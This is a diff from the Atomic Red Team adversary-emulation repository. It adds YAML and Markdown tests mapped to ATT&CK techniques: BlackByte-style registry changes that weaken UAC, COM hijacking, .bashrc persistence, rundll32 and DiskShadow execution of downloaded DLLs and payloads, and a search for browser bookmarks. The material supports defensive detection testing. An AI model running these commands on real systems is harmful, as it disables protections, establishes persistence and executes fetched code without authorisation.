+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v LocalAccountTokenFilterPolicy /f 2>&1
+      reg delete HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ /v EnableLinkedConnections /f 2>&1
+      reg delete HKLM\SYSTEM\CurrentControlSet\Control\FileSystem\ /v LongPathsEnabled /f 2>&1
+    name: command_prompt
+    elevation_required: true
+- name: BlackByte Ransomware Registry Changes - Powershell
+  auto_generated_guid: 0b79c06f-c788-44a2-8630-d69051f1123d
+  description: |
+    This task recreates the steps taken by BlackByte ransomware before it worms to other machines via Powershell.  See "Preparing to Worm" section: https://redcanary.com/blog/blackbyte-ransomware/
+    The steps are as follows:
+    <ol>
+        <li>1. Elevate Local Privilege by disabling UAC Remote Restrictions</li>
+        <li>2. Enable OS to share network connections between different privilege levels</li>
+        <li>3. Enable long path values for file paths, names, and namespaces to ensure encryption of all file names and paths</li>
+    </ol>
+    The registry keys and their respective values will be created upon successful execution.
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -PropertyType DWord -Value 1 -Force
+      New-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -PropertyType DWord -Value 1 -Force
+    cleanup_command: |
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name LocalAccountTokenFilterPolicy -Force
+      Remove-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" -Name EnableLinkedConnections -Force
+      Remove-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\FileSystem" -Name LongPathsEnabled -Force
+    name: powershell
+    elevation_required: true

atomics/T1123/T1123.md

@@ -8,6 +8,8 @@ Malware or scripts may be used to interact with the devices through an available
 
 - [Atomic Test #1 - using device audio capture commandlet](#atomic-test-1---using-device-audio-capture-commandlet)
 
+- [Atomic Test #2 - Registry artefact when application use microphone](#atomic-test-2---registry-artefact-when-application-use-microphone)
+
 
 <br/>
 
@@ -36,4 +38,37 @@ powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #2 - Registry artefact when application use microphone
+[can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /f
+```
+
+
+
+
+
 <br/>

atomics/T1123/T1123.yaml

@@ -11,4 +11,16 @@ atomic_tests:
     command: |
       powershell.exe -Command WindowsAudioDevice-Powershell-Cmdlet
     name: powershell
-
+- name: Registry artefact when application use microphone
+  auto_generated_guid: 7a21cce2-6ada-4f7c-afd9-e1e9c481e44a
+  description: |
+    [can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
+    cleanup_command: |
+      reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\microphone\NonPackaged\C:#Windows#Temp#atomic.exe /f
+    name: command_prompt

atomics/T1125/T1125.md

@@ -0,0 +1,46 @@
+# T1125 - Video Capture
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1125)
+<blockquote>An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.
+
+Malware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.
+
+In macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Registry artefact when application use webcam](#atomic-test-1---registry-artefact-when-application-use-webcam)
+
+
+<br/>
+
+## Atomic Test #1 - Registry artefact when application use webcam
+[can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a
+
+
+
+
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
+reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
+```
+
+#### Cleanup Commands:
+```cmd
+reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /f
+```
+
+
+
+
+
+<br/>

atomics/T1125/T1125.yaml

@@ -0,0 +1,16 @@
+attack_technique: T1125
+display_name: Video Capture
+atomic_tests:
+- name: Registry artefact when application use webcam
+  auto_generated_guid: 6581e4a7-42e3-43c5-a0d2-5a0d62f9702a
+  description: |
+    [can-you-track-processes-accessing-the-camera-and-microphone](https://svch0st.medium.com/can-you-track-processes-accessing-the-camera-and-microphone-7e6885b37072)
+  supported_platforms:
+  - windows
+  executor:
+    command: |
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStart /t REG_BINARY /d a273b6f07104d601 /f
+      reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /v LastUsedTimeStop /t REG_BINARY /d 96ef514b7204d601 /f
+    cleanup_command: |
+      reg DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\CapabilityAccessManager\ConsentStore\webcam\NonPackaged\C:#Windows#Temp#atomic.exe /f
+    name: command_prompt

atomics/T1135/T1135.md

@@ -74,7 +74,7 @@ Network Share Discovery using smbstatus
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
 | package_checker | Package checking command. Debian - dpkg -s samba | String | (rpm -q samba &>/dev/null) || (dpkg -s samba | grep -q installed)|
-| package_installer | Package installer command. Debian - apt install samba | String | (which yum && yum -y epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)|
+| package_installer | Package installer command. Debian - apt install samba | String | (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)|
 
 
 #### Attack Commands: Run with `bash`!  Elevation Required (e.g. root or admin) 

atomics/T1135/T1135.yaml

@@ -32,7 +32,7 @@ atomic_tests:
     package_installer:
       description: Package installer command. Debian - apt install samba
       type: String
-      default: (which yum && yum -y epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)
+      default: (which yum && yum -y install epel-release samba)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y samba)
   dependency_executor_name: bash
   dependencies:
   - description: |

atomics/T1217/T1217.md

@@ -22,6 +22,8 @@ Specific storage locations vary based on platform and/or application, but browse
 
 - [Atomic Test #7 - List Internet Explorer Bookmarks using the command prompt](#atomic-test-7---list-internet-explorer-bookmarks-using-the-command-prompt)
 
+- [Atomic Test #8 - List Safari Bookmarks on MacOS](#atomic-test-8---list-safari-bookmarks-on-macos)
+
 
 <br/>
 
@@ -251,4 +253,42 @@ dir /s /b %USERPROFILE%\Favorites
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #8 - List Safari Bookmarks on MacOS
+This test searches for Safari's Bookmarks file (on macOS) and lists any found instances to a text file.
+
+**Supported Platforms:** macOS
+
+
+**auto_generated_guid:** 5fc528dd-79de-47f5-8188-25572b7fafe0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| output_file | Path where captured results will be placed. | Path | /tmp/T1217-Safari.txt|
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+find / -path "*/Safari/Bookmarks.plist" 2>/dev/null >> #{output_file} 
+cat #{output_file}
+```
+
+#### Cleanup Commands:
+```sh
+rm -f #{output_file} 2>/dev/null
+```
+
+
+
+
+
 <br/>

atomics/T1217/T1217.yaml

@@ -97,3 +97,21 @@ atomic_tests:
     command: |
       dir /s /b %USERPROFILE%\Favorites
     name: command_prompt
+- name: List Safari Bookmarks on MacOS
+  auto_generated_guid: 5fc528dd-79de-47f5-8188-25572b7fafe0
+  description: |
+    This test searches for Safari's Bookmarks file (on macOS) and lists any found instances to a text file.
+  supported_platforms:
+  - macos
+  input_arguments:
+    output_file:
+      description: Path where captured results will be placed.
+      type: Path
+      default: /tmp/T1217-Safari.txt
+  executor:
+    command: |
+      find / -path "*/Safari/Bookmarks.plist" 2>/dev/null >> #{output_file} 
+      cat #{output_file} 
+    cleanup_command: |
+      rm -f #{output_file} 2>/dev/null
+    name: sh

atomics/T1218.011/T1218.011.md

@@ -24,6 +24,12 @@ Rundll32 can also be used to execute scripts such as JavaScript. This can be don
 
 - [Atomic Test #8 - Launches an executable using Rundll32 and pcwutl.dll](#atomic-test-8---launches-an-executable-using-rundll32-and-pcwutldll)
 
+- [Atomic Test #9 - Execution of non-dll using rundll32.exe](#atomic-test-9---execution-of-non-dll-using-rundll32exe)
+
+- [Atomic Test #10 - Rundll32 with Ordinal Value](#atomic-test-10---rundll32-with-ordinal-value)
+
+- [Atomic Test #11 - Rundll32 with Control_RunDLL](#atomic-test-11---rundll32-with-control_rundll)
+
 
 <br/>
 
@@ -352,4 +358,143 @@ rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - Execution of non-dll using rundll32.exe
+Rundll32.exe running non-dll
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** ae3a8605-b26e-457c-b6b3-2702fd335bac
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll|
+| input_file | Non-dll file | String | C:&#92;Users&#92;$env:username&#92;Downloads&#92;calc.png|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+rundll32.exe #{input_file}, StartW
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Non-dll file must exist on disk at specified location
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #10 - Rundll32 with Ordinal Value
+Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
+Upon successful execution, Calc.exe will spawn.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll|
+| input_file | DLL File | String | PathToAtomicsFolder&#92;T1218.010&#92;bin&#92;AllTheThingsx64.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+rundll32.exe #{input_file},#2
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL file must exist on disk at specified location
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+```
+
+
+
+
+<br/>
+<br/>
+
+## Atomic Test #11 - Rundll32 with Control_RunDLL
+Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e4c04b6f-c492-4782-82c7-3bf75eb8077e
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_url | Url to download the DLL | Url | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll|
+| input_file | DLL File | String | PathToAtomicsFolder&#92;T1047&#92;bin&#92;calc.dll|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+rundll32.exe shell32.dll,Control_RunDLL #{input_file}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL file must exist on disk at specified location
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+```
+
+
+
+
 <br/>

atomics/T1218.011/T1218.011.yaml

@@ -169,3 +169,85 @@ atomic_tests:
     command: |
       rundll32.exe pcwutl.dll,LaunchApplication #{exe_to_launch}
     name: command_prompt
+- name: Execution of non-dll using rundll32.exe
+  auto_generated_guid: ae3a8605-b26e-457c-b6b3-2702fd335bac
+  description: |
+    Rundll32.exe running non-dll 
+  supported_platforms:
+      - windows
+  input_arguments:
+    input_url:
+      description: Url to download the DLL
+      type: Url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
+    input_file:
+      description: Non-dll file
+      type: String
+      default: C:\Users\$env:username\Downloads\calc.png
+  dependency_executor_name: powershell 
+  dependencies: 
+  - description: |
+      Non-dll file must exist on disk at specified location
+    prereq_command: | 
+      if (Test-Path #{input_file}) {exit 0} else {exit 1}
+    get_prereq_command: | 
+      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+  executor:
+    name: powershell
+    command: | 
+      rundll32.exe #{input_file}, StartW
+- name: Rundll32 with Ordinal Value
+  auto_generated_guid: 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0
+  description: |
+    Rundll32.exe loading dll using ordinal value #2 to DLLRegisterServer. 
+    Upon successful execution, Calc.exe will spawn.
+  supported_platforms:
+      - windows
+  input_arguments:
+    input_url:
+      description: Url to download the DLL
+      type: Url
+      default: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/bin/AllTheThingsx64.dll
+    input_file:
+      description: DLL File
+      type: String
+      default: PathToAtomicsFolder\T1218.010\bin\AllTheThingsx64.dll
+  dependency_executor_name: powershell 
+  dependencies: 
+  - description: |
+      DLL file must exist on disk at specified location
+    prereq_command: | 
+      if (Test-Path #{input_file}) {exit 0} else {exit 1}
+    get_prereq_command: | 
+      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+  executor:
+    name: command_prompt
+    command: | 
+      rundll32.exe #{input_file},#2
+- name: Rundll32 with Control_RunDLL
+  auto_generated_guid: e4c04b6f-c492-4782-82c7-3bf75eb8077e
+  description: |
+    Rundll32.exe loading dll with 'control_rundll' within the command-line, loading a .cpl or another file type related to CVE-2021-40444. 
+  supported_platforms:
+      - windows
+  input_arguments:
+    input_url:
+      description: Url to download the DLL
+      type: Url
+      default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1047/bin/calc.dll
+    input_file:
+      description: DLL File
+      type: String
+      default: PathToAtomicsFolder\T1047\bin\calc.dll
+  dependency_executor_name: powershell 
+  dependencies: 
+  - description: |
+      DLL file must exist on disk at specified location
+    prereq_command: | 
+      if (Test-Path #{input_file}) {exit 0} else {exit 1}
+    get_prereq_command: | 
+      Invoke-WebRequest "#{input_url}" -OutFile "#{input_file}"
+  executor:
+    name: command_prompt
+    command: | 
+      rundll32.exe shell32.dll,Control_RunDLL #{input_file}

atomics/T1218/T1218.md

@@ -20,6 +20,8 @@
 
 - [Atomic Test #8 - Invoke-ATHRemoteFXvGPUDisablementCommand base test](#atomic-test-8---invoke-athremotefxvgpudisablementcommand-base-test)
 
+- [Atomic Test #9 - DiskShadow Command Execution](#atomic-test-9---diskshadow-command-execution)
+
 
 <br/>
 
@@ -392,4 +394,60 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #9 - DiskShadow Command Execution
+Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| txt_payload | txt to execute | Path | PathToAtomicsFolder&#92;T1218&#92;src&#92;T1218.txt|
+| dspath | Default location of DiskShadow.exe | Path | C:&#92;Windows&#92;System32&#92;diskshadow.exe|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+#{dspath} -S #{txt_payload}
+```
+
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: txt file must exist on disk at specified location (#{txt_payload})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+```
+##### Description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dspath}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+echo "DiskShadow.exe not found on disk at expected location"
+```
+
+
+
+
 <br/>

atomics/T1218/T1218.yaml

@@ -223,3 +223,36 @@ atomic_tests:
   executor:
     command: 'Invoke-ATHRemoteFXvGPUDisablementCommand -ModuleName #{module_name} -ModulePath #{module_path}'
     name: powershell
+- name: DiskShadow Command Execution
+  auto_generated_guid: 0e1483ba-8f0c-425d-b8c6-42736e058eaa
+  description: |
+    Emulates attack with a DiskShadow.exe (LOLBIN installed by default on Windows) being used to execute arbitrary commands Reference: https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
+  supported_platforms:
+    - windows
+  input_arguments:
+    txt_payload:
+      description: txt to execute
+      type: Path
+      default: PathToAtomicsFolder\T1218\src\T1218.txt
+    dspath:
+      description: Default location of DiskShadow.exe
+      type: Path
+      default: C:\Windows\System32\diskshadow.exe
+  dependency_executor_name: powershell 
+  dependencies: 
+    - description: txt file must exist on disk at specified location (#{txt_payload})
+      prereq_command: |
+        if (Test-Path #{txt_payload}) {exit 0} else {exit 1}
+      get_prereq_command: |
+        New-Item -Type Directory (split-path #{txt_payload}) -ErrorAction ignore | Out-Null
+        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218/src/T1218.txt" -OutFile "#{txt_payload}"
+    - description: DiskShadow.exe must exist on disk at specified location (#{dspath})
+      prereq_command: |
+        if (Test-Path #{dspath}) {exit 0} else {exit 1}
+      get_prereq_command: |
+        echo "DiskShadow.exe not found on disk at expected location"
+  executor:
+    command: |
+      #{dspath} -S #{txt_payload} 
+    name: powershell
+    elevation_required: false

atomics/T1218/src/T1218.txt

@@ -0,0 +1 @@
+EXEC c:\windows\system32\calc.exe

atomics/T1486/T1486.md

@@ -64,7 +64,7 @@ which_gpg=`which gpg`
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
+(which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
 ```
 
 
@@ -170,7 +170,7 @@ if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; els
 ```
 ##### Get Prereq Commands:
 ```bash
-(which yum && yum -y epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
+(which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
 ```
 
 

atomics/T1486/T1486.yaml

@@ -32,7 +32,7 @@ atomic_tests:
       prereq_command: |
         which_gpg=`which gpg`
       get_prereq_command: |
-        (which yum && yum -y epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
+        (which yum && yum -y install epel-release gpg)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y gpg)
   executor:
     name: bash
     elevation_required: false
@@ -110,7 +110,7 @@ atomic_tests:
         which_ccdecrypt=`which ccdecrypt`
         if [[ $USER == "root" ]]; then cp #{root_input_file_path} #{cped_file_path}; else cp #{user_input_file_path} #{cped_file_path}; fi
       get_prereq_command: |
-        (which yum && yum -y epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
+        (which yum && yum -y install epel-release ccrypt)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y ccrypt)
   executor:
     name: bash
     elevation_required: false

atomics/T1546.004/T1546.004.md

@@ -30,16 +30,20 @@ Adds a command to the .bash_profile file of the current user
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| command_to_add | Command to add to the .bash_profile file | String | /path/to/script.py|
+| command_to_add | Command to add to the .bash_profile file | String | echo "Hello from Atomic Red Team T1546.004"|
 
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-echo "#{command_to_add}" >> ~/.bash_profile
+echo '#{command_to_add}' >> ~/.bash_profile
 ```
 
+#### Cleanup Commands:
+```sh
+sed -i '/#{command_to_add}/d' ~/.bash_profile
+```
 
 
 
@@ -63,19 +67,23 @@ Adds a command to the .bashrc file of the current user
 #### Inputs:
 | Name | Description | Type | Default Value |
 |------|-------------|------|---------------|
-| command_to_add | Command to add to the .bashrc file | String | /path/to/script.py|
+| command_to_add | Command to add to the .bashrc file | String | echo "Hello from Atomic Red Team T1546.004"|
 
 
 #### Attack Commands: Run with `sh`! 
 
 
 ```sh
-echo "#{command_to_add}" >> ~/.bashrc
+echo '#{command_to_add}' >> ~/.bashrc
+```
+
+#### Cleanup Commands:
+```sh
+sed -i '/#{command_to_add}/d' ~/.bashrc
 ```
 
 
 
 
 
-
 <br/>

atomics/T1546.004/T1546.004.yaml

@@ -12,10 +12,12 @@ atomic_tests:
     command_to_add:
       description: Command to add to the .bash_profile file
       type: String
-      default: /path/to/script.py
+      default: echo "Hello from Atomic Red Team T1546.004"
   executor:
     command: |
-      echo "#{command_to_add}" >> ~/.bash_profile
+      echo '#{command_to_add}' >> ~/.bash_profile
+    cleanup_command: |
+      sed -i '/#{command_to_add}/d' ~/.bash_profile
     name: sh
 - name: Add command to .bashrc
   auto_generated_guid: 0a898315-4cfa-4007-bafe-33a4646d115f
@@ -28,8 +30,10 @@ atomic_tests:
     command_to_add:
       description: Command to add to the .bashrc file
       type: String
-      default: /path/to/script.py
+      default: echo "Hello from Atomic Red Team T1546.004"
   executor:
     command: |
-      echo "#{command_to_add}" >> ~/.bashrc
+      echo '#{command_to_add}' >> ~/.bashrc
+    cleanup_command: |
+      sed -i '/#{command_to_add}/d' ~/.bashrc
     name: sh

atomics/T1546.015/T1546.015.md

@@ -0,0 +1,68 @@
+# T1546.015 - Component Object Model Hijacking
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1546/015)
+<blockquote>Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.(Citation: Microsoft Component Object Model)  References to various COM objects are stored in the Registry. 
+
+Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.(Citation: GDATA COM Hijacking) An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection. </blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - COM Hijacking - InprocServer32](#atomic-test-1---com-hijacking---inprocserver32)
+
+
+<br/>
+
+## Atomic Test #1 - COM Hijacking - InprocServer32
+This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
+
+Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 48117158-d7be-441b-bc6a-d9e36e47b52b
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| clsid_threading | Threading Model | string | Apartment|
+| dllpath | Path to the DLL. | String | $env:TEMP&#92;AtomicTest.dll|
+| clsid | Class ID to hijack. | string | {B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}|
+| clsid_description | Description for CLSID | string | MSAA AccPropServices|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
+New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Value #{dllpath}
+New-ItemProperty -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}\InprocServer32' -Name 'ThreadingModel' -Value '#{clsid_threading}' -PropertyType "String"
+Start-Process -FilePath "C:\Windows\System32\RUNDLL32.EXE" -ArgumentList '-sta #{clsid}'
+```
+
+#### Cleanup Commands:
+```powershell
+Remove-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Recurse -ErrorAction Ignore
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: DLL For testing
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{dllpath}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}"
+```
+
+
+
+
+<br/>

atomics/T1546.015/T1546.015.yaml

@@ -0,0 +1,42 @@
+attack_technique: T1546.015
+display_name: 'Event Triggered Execution: Component Object Model Hijacking'
+atomic_tests:
+- name: COM Hijacking - InprocServer32
+  auto_generated_guid: 48117158-d7be-441b-bc6a-d9e36e47b52b
+  description: |-
+    This test uses PowerShell to hijack a reference to a Component Object Model by creating registry values under InprocServer32 key in the HKCU hive then calling the Class ID to be executed via rundll32.exe.
+
+    Reference: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
+  supported_platforms:
+  - windows
+  input_arguments:
+    clsid_threading:
+      description: Threading Model
+      type: string
+      default: Apartment
+    dllpath:
+      description: Path to the DLL.
+      type: String
+      default: $env:TEMP\AtomicTest.dll
+    clsid:
+      description: Class ID to hijack.
+      type: string
+      default: '{B5F8350B-0548-48B1-A6EE-88BD00B4A5E7}'
+    clsid_description:
+      description: Description for CLSID
+      type: string
+      default: MSAA AccPropServices
+  dependency_executor_name: powershell
+  dependencies:
+  - description: DLL For testing
+    prereq_command: 'if (Test-Path #{dllpath}) {exit 0} else {exit 1}'
+    get_prereq_command: Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1546.015/bin/AtomicTest.dll" -OutFile "#{dllpath}"
+  executor:
+    command: |-
+      New-Item -Path 'HKCU:\SOFTWARE\Classes\CLSID\#{clsid}' -Value '#{clsid_description}'
